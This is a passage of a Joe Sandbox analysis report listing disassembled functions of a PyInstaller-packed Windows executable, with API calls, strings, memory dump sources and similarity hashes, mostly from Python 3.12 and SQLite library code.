                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                                              • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                              • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                              • Instruction ID: edc58648ded7facd108a0e871cda2938f405d4af8264a3fdfcef124654868754
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63517D32A082828EEF748F25984426977E0EB55BA4F144136DE9DC7B85CF7EE491C70A
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF62C0F352C,?,00000000,00007FF62C0F3F1B), ref: 00007FF62C0F7F32
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateDirectory
                                                                                                                                                                                                                                              • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                              • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                              • Opcode ID: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                                              • Instruction ID: da0028179664f049e22b4f1bffd33e0486af6989451cb5dd699f3388cc5b11e9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4131D221719AC149FE219B24EC107AA6354EF88BF0F440231EE6D87BC9DF2DE6858706
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                                                              • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                              • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                              • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                              • Instruction ID: 3413cd746f8771c83a11a587361d0f0fd128e84aa27177f6b06a5d54e2988a5f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D121DE72B08B4186EB209B18F84A7EA63A4EB88794F400136EE8D9365ADF3CD245C741
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PyErr_SetString.PYTHON312(?,?,?,?,?,00007FFDFAA51EBC), ref: 00007FFDFAA53C1F
                                                                                                                                                                                                                                                • Part of subcall function 00007FFDFAA51FB0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFAA51FE8
                                                                                                                                                                                                                                                • Part of subcall function 00007FFDFAA51FB0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFAA52006
                                                                                                                                                                                                                                              • PyErr_Format.PYTHON312 ref: 00007FFDFAA51F33
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Err_strncmp$FormatString
                                                                                                                                                                                                                                              • String ID: name too long$undefined character name '%s'
                                                                                                                                                                                                                                              • API String ID: 3882229318-4056717002
                                                                                                                                                                                                                                              • Opcode ID: 1035d3c545dcad7f3fc1fcdb04c9696ab0948ab795443172b9eb40205ee2c5c7
                                                                                                                                                                                                                                              • Instruction ID: 8832d6bd2d56b579fa340f74c4973fe9238718322cffb85bc7110c4570998fdc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1035d3c545dcad7f3fc1fcdb04c9696ab0948ab795443172b9eb40205ee2c5c7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4112475F18A47D9EB049B54D4A49B87364FB48748F800472CA2E476E8DF6DE14FC704
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionRaisememcmp
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 2159421160-3727861699
                                                                                                                                                                                                                                              • Opcode ID: 4e3fcc6343683a443bf5f001e679ca8bd2fd4956ae95aff868c58ccb46c6ebe5
                                                                                                                                                                                                                                              • Instruction ID: 72df04bb0992ccca9b93bdeb361276a985e23a1f0833b80ac7e1df35b282403d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e3fcc6343683a443bf5f001e679ca8bd2fd4956ae95aff868c58ccb46c6ebe5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1F17B32B087429BE718CBB9D560AAD37A1FB04789F408075DE1D9BB99DF38E8168750
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 438689982-0
                                                                                                                                                                                                                                              • Opcode ID: 795a7b7c206bf73719766509282a2b498d48eb20adda9bc06bbc5577d3259f6c
                                                                                                                                                                                                                                              • Instruction ID: 48394b0b7e6c161969efbd715f41d87ee58c57549224ac50d6d7131b6dea818d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 795a7b7c206bf73719766509282a2b498d48eb20adda9bc06bbc5577d3259f6c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2921916A71875283D7689B56F5615BEA3A1FB44BC0B045135DF9E4BF9ACF3CE0518300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2718003287-0
                                                                                                                                                                                                                                              • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                              • Instruction ID: d5963c906391e85ea99114f779c0114a698e1561d3d64e507fde88feabfeb877
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61D12972B18E418AEB10CF69D8551EC3771FB147A8B044236DE4ED7B99DE38D02ACB06
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDFAC08BBF), ref: 00007FFDFAC08889
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDFAC08BBF), ref: 00007FFDFAC0890B
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDFAC08BBF), ref: 00007FFDFAC089FD
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: RETURNING may not use "TABLE.*" wildcards
                                                                                                                                                                                                                                              • API String ID: 3510742995-2313493979
                                                                                                                                                                                                                                              • Opcode ID: 7e7e19360dff169692bdddae953b084c6e9b73729217d5cafa84439cbde45142
                                                                                                                                                                                                                                              • Instruction ID: cf813461d316ee34b3794c6b8d0348d10ec1a0d2b606b70227b86dae562f7e32
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e7e19360dff169692bdddae953b084c6e9b73729217d5cafa84439cbde45142
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7B1AA26B08B9186EB28CB1594606AD77A1FB84BA4F49C375DEBD477D9DF38E091C300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62C10CF4B), ref: 00007FF62C10D07C
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62C10CF4B), ref: 00007FF62C10D107
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 953036326-0
                                                                                                                                                                                                                                              • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                              • Instruction ID: 45eb129ed847f8951ade3926d75fe5aa1df73fbef9a1ac62f0aaf31205d19dae
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57910432F1865185FF60AF699C4A2BD2BA0BB45BA8F544139DE0E93A85CF3DD452C702
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: %s.%s$column%d$rowid
                                                                                                                                                                                                                                              • API String ID: 0-1505470444
                                                                                                                                                                                                                                              • Opcode ID: 33050f6a5ce778ce640403e38a7c40036c7d6c6581dc2e086520fb0cdce24bb2
                                                                                                                                                                                                                                              • Instruction ID: 0fca9606a7d244fdbefcb4f661b5d4d860b5e1dcbb8c3253e2260b0ed8a5a29d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33050f6a5ce778ce640403e38a7c40036c7d6c6581dc2e086520fb0cdce24bb2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5491993AB08BC281EB688B55E464BA967A4FB45BA4F884366DE7C477D9DF38D441C300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: $, $CREATE TABLE
                                                                                                                                                                                                                                              • API String ID: 3510742995-3459038510
                                                                                                                                                                                                                                              • Opcode ID: f76ccd3bb34c7db3920a2cc9d10b0c626f5c4915572b658df107e96516dcb215
                                                                                                                                                                                                                                              • Instruction ID: 9d7bed7960741b72b51e0d3f71bfd3838d1dc0aaa19fdd58d79717731bcc8d63
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f76ccd3bb34c7db3920a2cc9d10b0c626f5c4915572b658df107e96516dcb215
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B614B66B0858286DB198F24E4606B9B7A2FB40BA4F888375DE7D477D9DF3DD446C300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: strncmp
                                                                                                                                                                                                                                              • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                                              • API String ID: 1114863663-87138338
                                                                                                                                                                                                                                              • Opcode ID: 8c364d9f7697f15a55bc755bfe662b8d9c35c3fd34f27cade82d87210dead623
                                                                                                                                                                                                                                              • Instruction ID: c7428386c9afd2a8bb72d06cef0d08f109592383b07ac58476d1fd5ed6649aff
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c364d9f7697f15a55bc755bfe662b8d9c35c3fd34f27cade82d87210dead623
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F61FC32B196414AE7A88A15AC20A7A7692FB84790F548275E97D477CCEF3CD90FC704
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: out of memory$string or blob too big
                                                                                                                                                                                                                                              • API String ID: 3510742995-2410398255
                                                                                                                                                                                                                                              • Opcode ID: 2546402ceff79975b6071e291ca9160533ac407746b903c1a5e86b998dc6c08d
                                                                                                                                                                                                                                              • Instruction ID: c97cf652bab5594e6423cd0aa67ee7bef90103b6751ca3eb5489b5bf5fcfd33b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2546402ceff79975b6071e291ca9160533ac407746b903c1a5e86b998dc6c08d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C61D166B0865282E718DB26E16067E6760FF45BD4F904072EF6D0BBD9CF3CE4418710
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 2221118986-3727861699
                                                                                                                                                                                                                                              • Opcode ID: 159c8cd1e32a2517d5495272a490daef04cfe9e72aabae1520912fecf18e95bc
                                                                                                                                                                                                                                              • Instruction ID: fc88b57ed95a571249ab20c41cb0a0cdb33bf74d0459189e42e9a1615e7d38a8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 159c8cd1e32a2517d5495272a490daef04cfe9e72aabae1520912fecf18e95bc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8451AE2271AB4196EB588B29D164BA973A4FB48F84F59807ADF5C4B798DF38E452C300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
